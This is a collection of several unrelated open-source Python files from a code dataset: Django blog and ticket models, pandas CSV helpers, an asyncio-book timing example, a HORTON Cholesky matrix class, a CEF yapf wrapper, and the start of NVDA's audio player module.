models.DateTimeField(auto_now_add=True)\n updated_time = models.DateTimeField(auto_now=True)\n publisher = models.ForeignKey(User, default=1, on_delete=models.CASCADE)\n my_tags = models.ManyToManyField(Tag, blank=True)\n category = models.ManyToManyField(Category, blank=True)\n star=models.ManyToManyField(User,blank=True,related_name=\"like_star\")\n seen=models.IntegerField(blank=True,null=True,default=0)\n short_link=models.CharField(max_length=20,null=True,blank=True)\n\n\n\n objects=BlogManager()\n def __str__(self):\n return self.title\n\n\n def number_of_starts(self):\n return self.star.count()\n def thumbnail_tag(self):\n\n return format_html(\" \".format(self.image.url))\n\t\t\n\n def jcal_time(self):\n return jcal(self.publish_time)\n jcal_time.short_description = \"published time\"\n\n def long_link(self):\n return settings.MY_HOST+\"blog/\"+self.slug\n def short_link_def(self):\n return settings.MY_HOST+\"sl/show/\"+self.short_link\n\n####Blog slug creator###\ndef product_pre_save_receiver(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n\n\npre_save.connect(product_pre_save_receiver, sender=Blog)\n\n\n\n\n#######################Comment sys#############################\n######################\n#####################\n\n####MAin comment##################\n\nclass CommentBlog(models.Model):\n sender=models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)\n text= models.TextField()\n posted_time = models.DateTimeField(auto_now_add=True, editable=False)\n blog= models.ForeignKey(Blog, on_delete=models.CASCADE,related_name='comments')\n active=models.BooleanField(default=False)\n like=models.ManyToManyField(User,blank=True,related_name=\"like_comment\")\n dislike=models.ManyToManyField(User,blank=True,related_name=\"dislike_comment\")\n\n \n def number_of_likes(self):\n return self.like.count()\n def number_of_dislikes(self):\n return self.dislike.count()\n ########################################################################################\n\n\n ########################ticket sys ##################################\n #######################\n ####################\n\n \nclass templatedir(models.Model):\n token = models.CharField(unique=True,max_length=250)\n file = models.FileField(storage=templatefs)\n date=models.DateTimeField(auto_now_add=True)\n def __str__(self):\n return self.token\n class Meta:\n verbose_name = 'templatedir'\n verbose_name_plural = 'templatedirs'\n\n\nclass menu(models.Model):\n name = models.CharField(max_length = 150)\n link = models.CharField(max_length = 250,blank=True)\n file = models.ManyToManyField(templatedir,blank=True,related_name='file_template')\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'menu'\n verbose_name_plural = 'menus'\n\n\n\n\nclass chanel(models.Model):\n token = models.UUIDField(unique=True)\n createor = models.ManyToManyField(User,related_name=\"createor\")\n date = models.DateTimeField(auto_now_add=True)\n vazit = models.BooleanField(default=False)\n title = models.CharField(max_length=250,blank=True)\n\n def jcal_time(self):\n return jcal(self.date)\n class Meta:\n verbose_name = 'chanel'\n verbose_name_plural = 'chanels'\n\nclass ticket(models.Model):\n chanel = models.ForeignKey(chanel,on_delete=models.CASCADE)\n sender = models.CharField(max_length = 150)\n title = models.CharField(max_length = 250,blank=True,null=True)\n mozoee = models.CharField(max_length = 250,blank=True,null=True)\n des = models.TextField()\n date = models.DateTimeField(default=timezone.now,blank=True)\n def jcal_time(self):\n return jcal(self.date)\n class Meta:\n verbose_name = 'ticket'\n verbose_name_plural = 'tickets'\n\n\n\n\n#################blog short link #######################\n#################\nclass ShortUrls(models.Model):\n short=models.CharField(max_length = 20,unique=True)\n long=models.URLField(\"URL\",unique=True)\n \n\n ########short pre save blog\n\n \n \ndef sl_pre_save_receiver(sender, instance, *args, **kwargs):\n if not instance.short_link:\n instance.short_link = Shortner().issue_token()\n ShortUrls.objects.create(long=instance.long_link(),short=instance.short_link)\n\n\npre_save.connect(sl_pre_save_receiver, sender=Blog)","repo_name":"aliaqa256/django_rizo","sub_path":"root/cms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"17257936207","text":"import logging\nfrom datetime import datetime\nfrom time import time\nimport pandas as pd\n\n\ndef loadDF(fileName):\n \"\"\"Load file and parse it to dataframe, converts date fields to datetime\n\n Arguments:\n file {str} -- file to load\n\n Returns:\n DataFrame -- parsed dataframe\n \"\"\"\n st = time()\n df = pd.read_csv(fileName, sep=';', na_values=['\\\\N', 'None'],\n encoding='utf-8', compression='gzip')\n for i in ['login_last_dt', 'log_dt']:\n if i in df.columns:\n df[i] = df[i].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))\n logging.debug('\\t\\tfile `%s` loaded in %0.2f sec', fileName, time()-st)\n return df\n\n\ndef saveDF(df, fileName):\n \"\"\"Save dataframe\n \"\"\"\n st = time()\n df.to_csv(fileName, sep=';', index=False, compression='gzip')\n logging.debug('\\t\\tfile `%s` saved in %0.2f sec', fileName, time()-st)\n return True\n","repo_name":"SergeAA/ml-prod","sub_path":"kurs/gamechurn/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28723057836","text":"import time\n#from urllib import response\nimport requests\n\ndef read_example() -> None:\n response = requests.get('https://www.baidu.com/')\n print(response.status_code)\n\nsync_start = time.time()\n\nread_example()\nread_example()\n\nsync_end =time.time()\n\nprint(f'Running synchrously took {sync_end - sync_start:.4f} seconds.')","repo_name":"DRAGONINWAVE/Python_Concurrency_with_asyncio","sub_path":"Chapter1_Getting_to_know_asyncio/Synchronously_reading_status_codes.py","file_name":"Synchronously_reading_status_codes.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"11885226109","text":"import numpy as np\n\nfrom horton.utils import check_type, check_options, doc_inherit\nfrom horton.matrix.base import parse_four_index_transform_exps, FourIndex\nfrom horton.matrix.cext import slice_to_three_abbc_abc, \\\n slice_to_three_abcc_bac, slice_to_three_abcc_abc\nfrom horton.matrix.dense import DenseLinalgFactory, DenseExpansion, \\\n DenseTwoIndex, DenseThreeIndex, DenseFourIndex\n\n\n__all__ = [\n 'CholeskyFourIndex', 'CholeskyLinalgFactory',\n]\n\n\nclass CholeskyLinalgFactory(DenseLinalgFactory):\n @doc_inherit(DenseLinalgFactory)\n def create_four_index(self, nbasis=None, nvec=None, array=None, array2=None):\n nbasis = nbasis or self.default_nbasis\n return CholeskyFourIndex(nbasis, nvec, array, array2)\n\n @doc_inherit(DenseLinalgFactory)\n def _check_four_index_init_args(self, four_index, nbasis=None, nvec=None, array=None):\n nbasis = nbasis or self.default_nbasis\n four_index.__check_init_args__(nbasis, nvec)\n\n create_four_index.__check_init_args__ = _check_four_index_init_args\n\n\nclass CholeskyFourIndex(FourIndex):\n \"\"\"Cholesky symmetric four-dimensional matrix.\n \"\"\"\n\n #\n # Constructor and destructor\n #\n\n def __init__(self, nbasis, nvec=None, array=None, array2=None):\n \"\"\"\n **Arguments:**\n\n nbasis\n The number of basis functions.\n\n **Optional arguments:**\n\n nvec\n The number of (2-index) Cholesky vectors.\n\n array\n The array with Cholesky vectors, shape = (nvec, nbasis, nbasis).\n\n array2\n The second set of Cholesky vectors, if different from the first.\n\n Either nvec or array must be given (or both).\n \"\"\"\n def check_array(a, name):\n if a.ndim != 3:\n raise TypeError('Argument %s has %i dimensions, expecting 3.' % (name, a.ndim))\n if nvec is not None and nvec != a.shape[0]:\n raise TypeError('nvec does not match %s.shape[0].' % name)\n if not (nbasis == a.shape[1] and nbasis == a.shape[2]):\n raise TypeError('nbasis does not match %s.shape[1] or %s.shape[2].' % (name, name))\n\n if array is None:\n self._self_alloc = True\n if nvec is None:\n raise TypeError('Either nvec or array must be given (or both).')\n if array2 is not None:\n raise TypeError('Argument array2 only allowed when array is given.')\n self._array = np.zeros([nvec, nbasis, nbasis])\n self._array2 = self._array\n else:\n self._self_alloc = False\n check_array(array, 'array')\n self._array = array\n if array2 is None:\n self._array2 = self._array\n else:\n check_array(array2, 'array2')\n self._array2 = array2\n\n #\n # Properties\n #\n\n def _get_shape(self):\n '''The shape of the object'''\n return (self._array.shape[1], self._array2.shape[1], self._array.shape[2], self._array2.shape[2])\n\n shape = property(_get_shape)\n\n #\n # Methods from base class\n #\n\n def __check_init_args__(self, nbasis, nvec):\n '''Is self compatible with the given constructor arguments?'''\n assert self._array is not None\n assert nbasis == self.nbasis\n assert nvec == self.nvec\n\n def __eq__(self, other):\n '''Compare self with other'''\n return isinstance(other, CholeskyFourIndex) and \\\n other.nbasis == self.nbasis and \\\n other.nvec == self.nvec and \\\n other.is_decoupled == self.is_decoupled and \\\n (other._array == self._array).all() and \\\n (other._array2 == self._array2).all()\n\n @classmethod\n def from_hdf5(cls, grp):\n '''Construct an instance from data previously stored in an h5py.Group.\n\n **Arguments:**\n\n grp\n An h5py.Group object.\n '''\n nvec = grp['array'].shape[0]\n nbasis = grp['array'].shape[1]\n result = cls(nbasis, nvec)\n grp['array'].read_direct(result._array)\n if 'array2' in grp:\n result.decouple_array2()\n grp['array2'].read_direct(result._array2)\n return result\n\n def to_hdf5(self, grp):\n '''Dump this object in an h5py.Group\n\n **Arguments:**\n\n grp\n An h5py.Group object.\n '''\n grp.attrs['class'] = self.__class__.__name__\n grp['array'] = self._array\n if self._array is not self._array:\n grp['array2'] = self._array2\n\n def new(self):\n '''Return a new four-index object with the same nbasis'''\n return CholeskyFourIndex(self.nbasis, self.nvec)\n\n def _check_new_init_args(self, other):\n '''Check whether an already initialized object is compatible'''\n other.__check_init_args__(self.nbasis, self.nvec)\n\n new.__check_init_args__ = _check_new_init_args\n\n def clear(self):\n '''Reset all elements to zero.'''\n self._array[:] = 0.0\n if self._array is not self._array2:\n self._array2[:] = 0.0\n\n def copy(self):\n '''Return a copy of the current four-index operator'''\n result = CholeskyFourIndex(self.nbasis, self.nvec)\n result.assign(self)\n return result\n\n def assign(self, other):\n '''Assign with the contents of another object\n\n **Arguments:**\n\n other\n Another CholeskyFourIndex object.\n '''\n check_type('other', other, CholeskyFourIndex)\n self._array[:] = other._array\n if other._array is other._array2:\n self.reset_array2()\n else:\n self.decouple_array2()\n self._array2[:] = other._array2\n\n def randomize(self):\n '''Fill with random normal data'''\n self._array[:] = np.random.normal(0, 1, self._array.shape)\n if self.is_decoupled:\n self._array2[:] = np.random.normal(0, 1, self._array2.shape)\n\n def permute_basis(self, permutation):\n '''Reorder the coefficients for a given permutation of basis functions.\n '''\n # Easy enough but irrelevant\n raise NotImplementedError\n\n def change_basis_signs(self, signs):\n '''Correct for different sign conventions of the basis functions.'''\n # Easy enough but irrelevant\n raise NotImplementedError\n\n def iadd(self, other, factor):\n '''This method is not supported due to the Cholesky decomposition.'''\n raise NotImplementedError\n\n def iscale(self, factor):\n '''In-place multiplication with a scalar\n\n **Arguments:**\n\n factor\n A scalar factor.\n '''\n self._array *= np.sqrt(factor)\n\n if self._array is not self._array2:\n #arrays have been transformed\n self._array2 *= np.sqrt(factor)\n\n def get_element(self, i, j, k, l):\n '''Return a matrix element'''\n return np.dot(self._array[:,i,k], self._array2[:,j,l])\n\n def set_element(self, i, j, k, l, value):\n '''This method is not supported due to the Cholesky decomposition.'''\n raise NotImplementedError\n\n #\n # Properties\n #\n\n def _get_nbasis(self):\n '''The number of basis functions'''\n return self._array.shape[1]\n\n nbasis = property(_get_nbasis)\n\n def _get_nvec(self):\n '''The number of Cholesky vectors'''\n return self._array.shape[0]\n\n nvec = property(_get_nvec)\n\n def _get_is_decoupled(self):\n return self._array is not self._array2\n\n is_decoupled = property(_get_is_decoupled)\n\n #\n # New methods for this implementation\n # TODO: consider adding these to base class\n #\n\n def decouple_array2(self):\n '''Allocates a second Cholesky vector if not done yet'''\n if self._array2 is self._array:\n self._array2 = self._array.copy()\n\n def reset_array2(self):\n \"\"\"Deallocates the second cholesky vector and sets it to match the first.\n \"\"\"\n if self._array2 is not self._array:\n self._array2 = self._array\n\n def get_dense(self):\n '''Return the DenseFourIndex equivalent. ONLY FOR TESTING. SUPER SLOW.\n '''\n result = DenseFourIndex(self.nbasis)\n np.einsum('kac,kbd->abcd', self._array, self._array2, out=result._array)\n return result\n\n def is_symmetric(self, symmetry=2, rtol=1e-5, atol=1e-8):\n '''Check the symmetry of the array.\n\n **Optional arguments:**\n\n symmetry\n The symmetry to check. See :ref:`dense_matrix_symmetry`\n for more details.\n\n rtol and atol\n relative and absolute tolerance. See to ``np.allclose``.\n '''\n if self.is_decoupled and symmetry in (2, 8):\n return False\n if symmetry in (4, 8):\n if not np.allclose(self._array, self._array.swapaxes(1,2), rtol, atol):\n return False\n if self.is_decoupled and not np.allclose(self._array2, self._array2.swapaxes(1,2), rtol, atol):\n return False\n return True\n\n def symmetrize(self, symmetry=8):\n check_options('symmetry', symmetry, 1, 2, 4, 8)\n if symmetry in (2, 8) and self.is_decoupled:\n # This is a different type of symmetrization than in the dense case!\n self._array[:] += self._array2\n self._array *= 0.5\n self.reset_array2()\n if symmetry in (4, 8):\n self._array[:] = self._array + self._array.transpose(0,2,1)\n if self.is_decoupled:\n self._array2[:] = self._array2 + self._array2.transpose(0,2,1)\n\n def itranspose(self):\n '''In-place transpose: ``0,1,2,3 -> 1,0,3,2``'''\n if self.is_decoupled:\n self._array, self._array2 = self._array2, self._array\n\n def sum(self):\n '''Return the sum of all elements. EXPENSIVE!'''\n return np.tensordot(self._array, self._array2,(0,0)).sum() #expensive!!\n\n def iadd_exchange(self):\n '''In-place addition of its own exchange contribution'''\n raise NotImplementedError\n\n def slice_to_two(self, subscripts, out=None, factor=1.0, clear=True):\n \"\"\"Returns a two-index contraction of the four-index object.\n\n **Arguments:**\n\n subscripts\n Any of ``aabb->ab``, ``abab->ab``, ``abba->ab``\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n \"\"\"\n # Error checking\n check_options('subscripts', subscripts, 'aabb->ab', 'abab->ab', 'abba->ab')\n # Handle output argument\n if out is None:\n out = DenseTwoIndex(self.nbasis)\n else:\n check_type('out', out, DenseTwoIndex)\n if clear:\n out.clear()\n # Actual computation\n if subscripts == 'aabb->ab':\n out._array[:] += factor*np.einsum('xab,xab->ab', self._array, self._array2)\n elif subscripts == 'abab->ab':\n out._array[:] += factor*np.einsum('xaa,xbb->ab', self._array, self._array2)\n elif subscripts == 'abba->ab':\n out._array[:] += factor*np.einsum('xab,xba->ab', self._array, self._array2)\n return out\n\n def slice_to_three(self, subscripts, out=None, factor=1.0, clear=True):\n \"\"\"Returns a three-index contraction of the four-index object.\n\n **Arguments:**\n\n subscripts\n Any of ``abcc->bac``, ``abcc->abc``, ``abcb->abc``, ``abbc->abc``\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n \"\"\"\n # Error checking\n check_options('subscripts', subscripts, 'abcc->bac', 'abcc->abc', 'abcb->abc', 'abbc->abc')\n if out is None:\n out = DenseThreeIndex(self.nbasis)\n else:\n check_type('out', out, DenseThreeIndex)\n if clear:\n out.clear()\n # Actual computation\n if subscripts == 'abbc->abc':\n slice_to_three_abbc_abc(self._array, self._array2, out._array, factor, clear)\n elif subscripts == 'abcc->bac':\n slice_to_three_abcc_bac(self._array, self._array2, out._array, factor, clear)\n elif subscripts == 'abcc->abc':\n slice_to_three_abcc_abc(self._array, self._array2, out._array, factor, clear)\n elif subscripts == 'abcb->abc':\n L_r = np.diagonal(self._array2, axis1=1, axis2=2)\n out._array[:] += factor*np.tensordot(self._array, L_r, [(0,),(0,)]).swapaxes(1,2)\n return out\n\n def contract_two_to_four(self, subscripts, two, out=None, factor=1.0, clear=True):\n '''Contracts with a two-index object to obtain a four-index object.\n\n **Arguments:**\n\n subscripts\n Any of ``abcd,cd->acbd``, ``abcd,cd->acdb``, ``abcd,cb->acdb``,\n ``abcd,cb->acbd``, ``abcd,ab->acbd``, ``abcd,ab->acdb``,\n ``abcd,ad->acbd``, ``abcd,ad->acdb``, ``abcd,ad->abcd``,\n ``abcd,ad->abdc``, ``abcd,bd->abcd``, ``abcd,bd->abdc``,\n ``abcd,bc->abdc``, ``abcd,bc->abcd``, ``abcd,ac->abcd``,\n ``abcd,ac->abdc``\n\n two\n An instance of DenseTwoIndex.\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n '''\n check_options('subscripts', subscripts, 'abcd,cd->acbd',\n 'abcd,cd->acdb', 'abcd,cb->acdb', 'abcd,cb->acbd', 'abcd,ab->acbd',\n 'abcd,ab->acdb', 'abcd,ad->acbd', 'abcd,ad->acdb', 'abcd,ad->abcd',\n 'abcd,ad->abdc', 'abcd,bd->abcd', 'abcd,bd->abdc', 'abcd,bc->abdc',\n 'abcd,bc->abcd', 'abcd,ac->abcd', 'abcd,ac->abdc')\n raise NotImplementedError\n\n def contract_two_to_two(self, subscripts, two, out=None, factor=1.0, clear=True):\n \"\"\"Contract self with a two-index to obtain a two-index.\n\n **Arguments:**\n\n subscripts\n Any of ``abcd,bd->ac`` (direct), ``abcd,cb->ad`` (exchange)\n\n two\n The input two-index object. (DenseTwoIndex)\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n \"\"\"\n check_options('subscripts', subscripts, 'abcd,bd->ac', 'abcd,cb->ad')\n if out is None:\n out = DenseTwoIndex(self.nbasis)\n if clear:\n out.clear()\n else:\n check_type('out', out, DenseTwoIndex)\n if subscripts == 'abcd,bd->ac':\n tmp = np.tensordot(self._array2, two._array, axes=([(1,2),(1,0)]))\n out._array[:] += factor*np.tensordot(self._array, tmp, [0,0])\n elif subscripts == 'abcd,cb->ad':\n tmp = np.tensordot(self._array2, two._array, axes=([1,1]))\n out._array[:] += factor*np.tensordot(self._array, tmp, ([0,2],[0,2]))\n return out\n\n def assign_four_index_transform(self, ao_integrals, exp0, exp1=None, exp2=None, exp3=None, method='tensordot'):\n '''Perform four index transformation.\n\n **Arguments:**\n\n oa_integrals\n A CholeskyFourIndex with integrals in atomic orbitals.\n\n exp0\n A DenseExpansion object with molecular orbitals\n\n **Optional arguments:**\n\n exp1, exp2, exp3\n Can be provided to transform each index differently. See\n ``parse_four_index_transform_exps`` for details.\n\n method\n Either ``einsum`` or ``tensordot`` (default).\n '''\n check_type('ao_integrals', ao_integrals, CholeskyFourIndex)\n exp0, exp1, exp2, exp3 = parse_four_index_transform_exps(exp0, exp1, exp2, exp3, DenseExpansion)\n if method == 'einsum':\n if ao_integrals.is_decoupled or not (exp0 is exp1 and exp2 is exp3):\n self.decouple_array2()\n self._array2[:] = np.einsum('bi,kbd->kid', exp1.coeffs, ao_integrals._array2)\n self._array2[:] = np.einsum('dj,kid->kij', exp3.coeffs, self._array2)\n self._array[:] = np.einsum('ai,kac->kic', exp0.coeffs, ao_integrals._array)\n self._array[:] = np.einsum('cj,kic->kij', exp2.coeffs, self._array)\n elif method == 'tensordot':\n if ao_integrals.is_decoupled or not (exp0 is exp1 and exp2 is exp3):\n self.decouple_array2()\n self._array2[:] = np.tensordot(ao_integrals._array2, exp1.coeffs, axes=([1],[0]))\n self._array2[:] = np.tensordot(self._array2, exp3.coeffs, axes=([1],[0]))\n self._array[:] = np.tensordot(ao_integrals._array, exp0.coeffs, axes=([1],[0]))\n self._array[:] = np.tensordot(self._array, exp2.coeffs, axes=([1],[0]))\n else:\n raise ValueError('The method must either be \\'einsum\\' or \\'tensordot\\'.')\n","repo_name":"binghuang2018/horton","sub_path":"horton/horton/matrix/cholesky.py","file_name":"cholesky.py","file_ext":"py","file_size_in_byte":17045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"2527176250","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom exec_util import exec_cmd\nimport os\nimport sys\n\n# Script directory.\nscript_dir = os.path.dirname(__file__)\nroot_dir = os.path.join(script_dir, os.pardir)\n\n\ndef yapf_format(file_name, file_contents):\n # Reads .style.yapf in the root_dir when specifying contents via stdin.\n result = exec_cmd(\"%s %s/yapf\" % (sys.executable, script_dir), root_dir,\n file_contents.encode('utf-8'))\n if result['err'] != '':\n print(\"yapf error: %s\" % result['err'])\n if result['out'] != '':\n output = result['out']\n if sys.platform == 'win32':\n # Convert to Unix line endings.\n output = output.replace(\"\\r\", \"\")\n return output\n return None\n","repo_name":"chromiumembedded/cef","sub_path":"tools/yapf_util.py","file_name":"yapf_util.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":2662,"dataset":"github-code","pt":"70"}
+{"seq_id":"29674045548","text":"#nvwave.py\r\n#A part of NonVisual Desktop Access (NVDA)\r\n#Copyright (C) 2007-2017 NV Access Limited, Aleksey Sadovoy\r\n#This file is covered by the GNU General Public License.\r\n#See the file COPYING for more details.\r\n\r\n\"\"\"Provides a simple Python interface to playing audio using the Windows multimedia waveOut functions, as well as other useful utilities.\r\n\"\"\"\r\n\r\nimport threading\r\nimport typing\r\nfrom ctypes import (\r\n\twindll,\r\n\tPOINTER,\r\n\tStructure,\r\n\tc_uint,\r\n\tcreate_unicode_buffer,\r\n\tsizeof,\r\n\tbyref,\r\n)\r\nfrom ctypes.wintypes import (\r\n\tHANDLE,\r\n\tWORD,\r\n\tDWORD,\r\n\tLPSTR,\r\n\tWCHAR,\r\n\tUINT,\r\n\tLPUINT\r\n)\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport time\r\nimport atexit\r\nimport wx\r\nimport garbageHandler\r\nimport winKernel\r\nimport wave\r\nimport config\r\nfrom logHandler import log\r\nimport os.path\r\n\r\n__all__ = (\r\n\t\"WavePlayer\", \"getOutputDeviceNames\", \"outputDeviceIDToName\", \"outputDeviceNameToID\",\r\n)\r\n\r\nwinmm = windll.winmm\r\n\r\nHWAVEOUT = HANDLE\r\nLPHWAVEOUT = POINTER(HWAVEOUT)\r\n\r\nclass WAVEFORMATEX(Structure):\r\n\t_fields_ = [\r\n\t\t(\"wFormatTag\", WORD),\r\n\t\t(\"nChannels\", WORD),\r\n\t\t(\"nSamplesPerSec\", DWORD),\r\n\t\t(\"nAvgBytesPerSec\", DWORD),\r\n\t\t(\"nBlockAlign\", WORD),\r\n\t\t(\"wBitsPerSample\", WORD),\r\n\t\t(\"cbSize\", WORD)\r\n\t]\r\nLPWAVEFORMATEX = POINTER(WAVEFORMATEX)\r\n\r\nclass WAVEHDR(Structure):\r\n\tpass\r\nLPWAVEHDR = POINTER(WAVEHDR)\r\nWAVEHDR._fields_ = [\r\n\t(\"lpData\", LPSTR),\r\n\t(\"dwBufferLength\", DWORD),\r\n\t(\"dwBytesRecorded\", DWORD),\r\n\t(\"dwUser\", DWORD),\r\n\t(\"dwFlags\", DWORD),\r\n\t(\"dwLoops\", DWORD),\r\n\t(\"lpNext\", LPWAVEHDR),\r\n\t(\"reserved\", DWORD)\r\n]\r\nWHDR_DONE = 1\r\n\r\nWAVE_FORMAT_PCM = 1\r\nWAVE_MAPPER = -1\r\nMMSYSERR_NOERROR = 0\r\n\r\nCALLBACK_NULL = 0\r\n#CALLBACK_FUNCTION = 0x30000\r\nCALLBACK_EVENT = 0x50000\r\n#waveOutProc = CFUNCTYPE(HANDLE, UINT, DWORD, DWORD, DWORD)\r\n#WOM_DONE = 0x3bd\r\n\r\nMAXPNAMELEN = 32\r\nclass WAVEOUTCAPS(Structure):\r\n\t_fields_ = [\r\n\t\t('wMid', WORD),\r\n\t\t('wPid', WORD),\r\n\t\t('vDriverVersion', c_uint),\r\n\t\t('szPname', WCHAR*MAXPNAMELEN),\r\n\t\t('dwFormats', DWORD),\r\n\t\t('wChannels', WORD),\r\n\t\t('wReserved1', WORD),\r\n\t\t('dwSupport', DWORD),\r\n\t]\r\n\r\n\r\n# Set argument types.\r\nwinmm.waveOutOpen.argtypes = (LPHWAVEOUT, UINT, LPWAVEFORMATEX, DWORD, DWORD, DWORD)\r\nwinmm.waveOutGetID.argtypes = (HWAVEOUT, LPUINT)\r\n\r\n\r\n# Initialize error checking.\r\ndef _winmm_errcheck(res, func, args):\r\n\tif res != MMSYSERR_NOERROR:\r\n\t\tbuf = create_unicode_buffer(256)\r\n\t\twinmm.waveOutGetErrorTextW(res, buf, sizeof(buf))\r\n\t\traise WindowsError(res, buf.value)\r\nfor func in (\r\n\twinmm.waveOutOpen, winmm.waveOutPrepareHeader, winmm.waveOutWrite, winmm.waveOutUnprepareHeader,\r\n\twinmm.waveOutPause, winmm.waveOutRestart, winmm.waveOutReset, winmm.waveOutClose,\r\n\twinmm.waveOutGetDevCapsW,\r\n\twinmm.waveOutGetID,\r\n):\r\n\tfunc.errcheck = _winmm_errcheck\r\n\r\n\r\ndef _isDebugForNvWave():\r\n\treturn config.conf[\"debugLog\"][\"nvwave\"]\r\n\r\nclass WavePlayer(garbageHandler.TrackedObject):\r\n\t\"\"\"Synchronously play a stream of audio.\r\n\tTo use, construct an instance and feed it waveform audio using L{feed}.\r\n\tKeeps device open until it is either not available, or WavePlayer is explicitly closed / deleted.\r\n\tWill attempt to use the preferred device, if not will fallback to the WAVE_MAPPER device.\r\n\tWhen not using the preferred device, when idle devices will be checked to see if the preferred\r\n\tdevice has become available again. If so, it will be re-instated.\r\n\t\"\"\"\r\n\t#: Minimum length of buffer (in ms) before audio is played.\r\n\tMIN_BUFFER_MS = 300\r\n\t#: Flag used to signal that L{stop} has been called.\r\n\tSTOPPING = \"stopping\"\r\n\t#: A lock to prevent WaveOut* functions from being called simultaneously,\r\n\t# as this can cause problems even if they are for different HWAVEOUTs.\r\n\t_global_waveout_lock = threading.RLock()\r\n\t_audioDucker=None\r\n\t#: Used to allow the device to temporarily be changed and return\r\n\t# to the preferred device when it becomes available\r\n\t_preferredDeviceName: str\r\n\t#: The currently set device name.\r\n\t_outputDeviceName: str\r\n\t#: The id of the device when it was opened.\r\n\t# It is set to None when the device is closed again.\r\n\t_outputDeviceID: int\r\n\t#: Use the default device, this is the configSpec default value.\r\n\tDEFAULT_DEVICE_KEY = \"default\"\r\n\r\n\tdef __init__(\r\n\t\t\tself,\r\n\t\t\tchannels: int,\r\n\t\t\tsamplesPerSec: int,\r\n\t\t\tbitsPerSample: int,\r\n\t\t\toutputDevice: typing.Union[str, int] = WAVE_MAPPER,\r\n\t\t\tcloseWhenIdle: bool = False,\r\n\t\t\twantDucking: bool = True,\r\n\t\t\tbuffered: bool = False\r\n\t\t):\r\n\t\t\"\"\"Constructor.\r\n\t\t@param channels: The number of channels of audio; e.g. 2 for stereo, 1 for mono.\r\n\t\t@param samplesPerSec: Samples per second (hz).\r\n\t\t@param bitsPerSample: The number of bits per sample.\r\n\t\t@param outputDevice: The device ID or name of the audio output device to use.\r\n\t\t@param closeWhenIdle: If C{True}, close the output device when no audio is being played.\r\n\t\t@param wantDucking: if true then background audio will be ducked on Windows 8 and higher\r\n\t\t@param buffered: Whether to buffer small chunks of audio to prevent audio glitches.\r\n\t\t@note: If C{outputDevice} is a name and no such device exists, the default device will be used.\r\n\t\t@raise WindowsError: If there was an error opening the audio output device.\r\n\t\t\"\"\"\r\n\t\tself.channels=channels\r\n\t\tself.samplesPerSec=samplesPerSec\r\n\t\tself.bitsPerSample=bitsPerSample\r\n\r\n\t\tself._setCurrentDevice(preferredDevice=outputDevice)\r\n\t\tself._preferredDeviceName = self._outputDeviceName\r\n\r\n\t\tif wantDucking:\r\n\t\t\timport audioDucking\r\n\t\t\tif audioDucking.isAudioDuckingSupported():\r\n\t\t\t\tself._audioDucker=audioDucking.AudioDucker()\r\n\t\t#: If C{True}, close the output device when no audio is being played.\r\n\t\t#: @type: bool\r\n\t\tself.closeWhenIdle = closeWhenIdle\r\n\t\tif buffered:\r\n\t\t\t#: Minimum size of the buffer before audio is played.\r\n\t\t\t#: However, this is ignored if an C{onDone} callback is provided to L{feed}.\r\n\t\t\tBITS_PER_BYTE = 8\r\n\t\t\tMS_PER_SEC = 1000\r\n\t\t\tself._minBufferSize = samplesPerSec * channels * (bitsPerSample / BITS_PER_BYTE) / MS_PER_SEC * self.MIN_BUFFER_MS\r\n\t\t\tself._buffer = b\"\"\r\n\t\telse:\r\n\t\t\tself._minBufferSize = None\r\n\t\t#: Function to call when the previous chunk of audio has finished playing.\r\n\t\tself._prevOnDone = None\r\n\t\tself._waveout = None\r\n\t\tself._waveout_event = winKernel.kernel32.CreateEventW(None, False, False, None)\r\n\t\tself._waveout_lock = threading.RLock()\r\n\t\tself._lock = threading.RLock()\r\n\t\tself.open()\r\n\r\n\tdef _setCurrentDevice(self, preferredDevice: typing.Union[str, int]) -> None:\r\n\t\t\"\"\" Sets the _outputDeviceID and _outputDeviceName to the preferredDevice if\r\n\t\tit is available, otherwise falls back to WAVE_MAPPER.\r\n\t\t@param preferredDevice: The preferred device to use.\r\n\t\t\"\"\"\r\n\t\tif preferredDevice == WAVE_MAPPER or preferredDevice == self.DEFAULT_DEVICE_KEY:\r\n\t\t\tself._outputDeviceID = WAVE_MAPPER\r\n\t\t\tself._outputDeviceName = \"WAVE_MAPPER\"\r\n\t\t\treturn\r\n\t\ttry:\r\n\t\t\tif isinstance(preferredDevice, str):\r\n\t\t\t\tself._outputDeviceID = outputDeviceNameToID(\r\n\t\t\t\t\tpreferredDevice,\r\n\t\t\t\t\tuseDefaultIfInvalid=True # fallback to WAVE_MAPPER\r\n\t\t\t\t)\r\n\t\t\t\t# If default is used, get the appropriate name.\r\n\t\t\t\tself._outputDeviceName = outputDeviceIDToName(self._outputDeviceID)\r\n\t\t\telif isinstance(preferredDevice, int):\r\n\t\t\t\tself._outputDeviceID = preferredDevice\r\n\t\t\t\tself._outputDeviceName = outputDeviceIDToName(preferredDevice)\r\n\t\t\telse:\r\n\t\t\t\traise TypeError(\"outputDevice\")\r\n\t\texcept (LookupError, TypeError):\r\n\t\t\tlog.warning(\r\n\t\t\t\tf\"Unsupported WavePlayer device argument: 